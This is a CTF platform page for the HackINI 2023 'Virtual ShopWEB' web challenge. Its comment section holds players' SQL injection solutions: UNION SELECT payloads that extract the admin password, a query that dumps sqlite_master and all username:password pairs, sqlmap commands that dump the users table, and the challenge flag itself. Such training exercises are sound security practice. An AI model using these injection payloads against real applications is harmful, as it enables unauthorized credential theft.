Virtual ShopWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 465
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
评论
tenwool 1月前

这个判断逻辑是只要查密码就出flag,所以最简单的就是union select 1,2,3,password from users --+直接就出来了

回复 0

tenwool 1月前

搞了半天没做出来,原来提示里全都给了. order by 查出4列 union select 1,2,3,4 发现第二列不回显,提示又让找密码,直接 union select (select password from users where username='admin'),2,3,4 --+,出flag

回复 0

tdwj 10月前

一开始' union select 1,2,database(),4--+报错,看提示' union select 1,2,username,password from users--+倒是可出flag

回复 0

欧尼酱001 1年前

1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

回复 0
WCRH 1年前

这又不是post请求,你还保存上txt了

回复 0

.⎛⎝•̀ω•́⎠⎞. 2年前

只用sqlmap就可以做出来,很简单的一个注入

回复 0

FADogeCTF 2年前

union查询

回复 0

xiaobai568 2年前

前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了

回复 2

JJhello 2年前

sqlmap即可

回复 0

chaoge 2年前

sqlite,弄了半天认为是MySQL呢。

回复 0

justsosoloveyou 2年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1

WriteUp

image
heyile

1 金币

评分(0)

暂无评分

解题动态

wangmazikkll 攻破了该题 1天前
hdcc1 攻破了该题 2天前
huozi 攻破了该题 5天前
fenicnn 攻破了该题 5天前
acdfp123 攻破了该题 5天前
一世温华 攻破了该题 6天前
爱吃馒头 攻破了该题 15天前
wjzkifaa 攻破了该题 16天前
13615049106 攻破了该题 19天前
asdliuyan 攻破了该题 20天前
Thr0ne 攻破了该题 21天前
houst 攻破了该题 22天前
Kakivare 攻破了该题 28天前
晴空LMDK 攻破了该题 1月前
Zhengzanmei 攻破了该题 1月前
yexiaoye 攻破了该题 1月前
Q@vqi 攻破了该题 1月前
GDGZ_CTF 攻破了该题 1月前
nickhu 攻破了该题 1月前
Q-Larry 攻破了该题 1月前
问题反馈